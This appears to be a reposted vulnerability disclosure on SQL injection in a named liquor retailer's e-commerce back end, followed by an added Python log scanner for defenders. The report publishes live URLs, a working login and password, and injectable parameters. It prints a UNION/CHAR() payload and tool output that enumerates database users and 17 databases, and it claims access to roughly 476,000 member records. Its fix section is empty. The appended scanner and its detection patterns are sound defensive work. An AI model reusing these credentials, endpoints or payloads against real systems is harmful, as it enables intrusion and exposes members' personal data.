Moutai e-commerce back end: multiple SQL injection vulnerabilities (DBA privileges / 17 databases / 470,000 members)

Source: Internet
Author: User
Tags openid


Note:

http://www.emaotai.cn:90/zyd/

Account: wanglei

Password: 123456

SQL injection points in GET parameters:


http://www.emaotai.cn:90/zyd/Sales/XsdEdit.aspx?Pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650
http://www.emaotai.cn:90/zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18

SQL injection points in POST parameters (they can be found by entering a single quote in the search boxes):


There are many more similar issues; please check for them yourselves.

http://www.emaotai.cn:90/zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650

Example

Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----
[09:33:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:33:34] [INFO] fetching database users
[09:33:35] [INFO] the SQL query used returns 12 entries
[09:33:35] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##
[09:33:35] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##
[09:33:36] [INFO] retrieved: actuser
[09:33:36] [INFO] retrieved: bmDev
[09:33:36] [INFO] retrieved: dev
[09:33:36] [INFO] retrieved: distributor_admin
[09:33:37] [INFO] retrieved: hishop_pj
[09:33:37] [INFO] retrieved: hishop_pj
[09:33:37] [INFO] retrieved: moutaiwssc
[09:33:38] [INFO] retrieved: mysys
[09:33:38] [INFO] retrieved: sa
[09:33:38] [INFO] retrieved: taxreader
database management system users [11]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] actuser
[*] bmDev
[*] dev
[*] distributor_admin
[*] hishop_pj
[*] moutaiwssc
[*] mysys
[*] sa
[*] taxreader

 

Payload: ReturnPage=Xsflz.aspx&spbh=-4455' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(108)+CHAR(78)+CHAR(99)+CHAR(104)+CHAR(87)+CHAR(106)+CHAR(74)+CHAR(76)+CHAR(83)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)-----
[09:31:54] [INFO] testing Microsoft SQL Server
[09:31:54] [INFO] confirming Microsoft SQL Server
[09:31:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:31:55] [INFO] fetching database names
[09:31:55] [INFO] the SQL query used returns 18 entries
[09:31:56] [INFO] retrieved: distribution
[09:31:56] [INFO] retrieved: DrpEco
[09:31:56] [INFO] retrieved: drpecosdl
[09:31:56] [INFO] retrieved: DrpEcoTest
[09:31:57] [INFO] retrieved: eAct
[09:31:57] [INFO] retrieved: eActTest
[09:31:57] [INFO] retrieved: emaotai_act_test
[09:31:58] [INFO] retrieved: emaotai_act_test
[09:31:58] [INFO] retrieved: emaotai_logs
[09:31:58] [INFO] retrieved: hishop
[09:31:59] [INFO] retrieved: master
[09:31:59] [INFO] retrieved: model
[09:31:59] [INFO] retrieved: moutai
[09:31:59] [INFO] retrieved: moutaitest
[09:32:00] [INFO] retrieved: msdb
[09:32:00] [INFO] retrieved: ReportServer
[09:32:00] [INFO] retrieved: ReportServerTempDB
[09:32:01] [INFO] retrieved: tempdb
available databases [17]:
[*] distribution
[*] DrpEco
[*] drpecosdl
[*] DrpEcoTest
[*] eAct
[*] eActTest
[*] emaotai_act_test
[*] emaotai_logs
[*] hishop
[*] master
[*] model
[*] moutai
[*] moutaitest
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb



aspnet_Members is the member table, with 476302 entries; the first two entries were retrieved.

Solution:

You are more professional than me.
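
For defenders reviewing logs of an application like the one reported above, the following added example (not part of the original report) flags requests whose numeric ID parameters carry non-numeric values or the UNION/CHAR() shapes seen in the report's payload. The log line format, the `NUMERIC_PARAMS` set, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumption: these parameters only ever carry non-negative integer IDs,
# as in the report's URLs (spbh=650, Pjbh=111000100020, op=2).
NUMERIC_PARAMS = {"spbh", "pjbh", "op"}

# Shapes taken from the report's payload: UNION ... SELECT and a chain of CHAR(n) calls.
SQLI_SHAPES = [
    re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    re.compile(r"(?:char\s*\(\s*\d+\s*\)[\s+]*){3,}", re.I),
]

def inspect_url(url):
    """Return [(param, reason), ...] for one request URL (path plus query string)."""
    findings = []
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:  # parse_qs has already percent-decoded the value
            if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,18}", value):
                findings.append((name, "non-numeric value in numeric parameter"))
            if any(shape.search(value) for shape in SQLI_SHAPES):
                findings.append((name, "SQL injection shape"))
    return findings

def scan_log(lines):
    """Group findings by client IP. Line format (constructed): 'ip method url status'."""
    by_client = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not match the simplified format
        ip, _method, url, _status = parts
        for param, reason in inspect_url(url):
            by_client[ip].append((urlsplit(url).path, param, reason))
    return dict(by_client)

# Constructed sample lines; addresses are documentation ranges, the payload is shortened.
SAMPLE_LOG = [
    "192.0.2.10 GET /zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=650 200",
    "198.51.100.7 GET /zyd/Sales/Xsmxz.aspx?ReturnPage=Xsflz.aspx&spbh=-4455%27%20UNION"
    "%20ALL%20SELECT%20CHAR(113)%2BCHAR(122)%2BCHAR(118)%2BCHAR(120)--%20 200",
    "198.51.100.7 GET /zyd/Store/Kctz.aspx?ReturnPage=Tzflz.aspx&spbh=18%27 500",
    "192.0.2.10 GET /zyd/Sales/XsdEdit.aspx?Pjbh=111000100020&ReturnPage=Xsmxz.aspx&op=2 200",
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        for path, param, reason in hits:
            print(ip, path, param, reason)
```

The same integer check belongs in the application before the value reaches any query; detection only helps triage. The root fix is parameterized queries and a database login without DBA rights.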
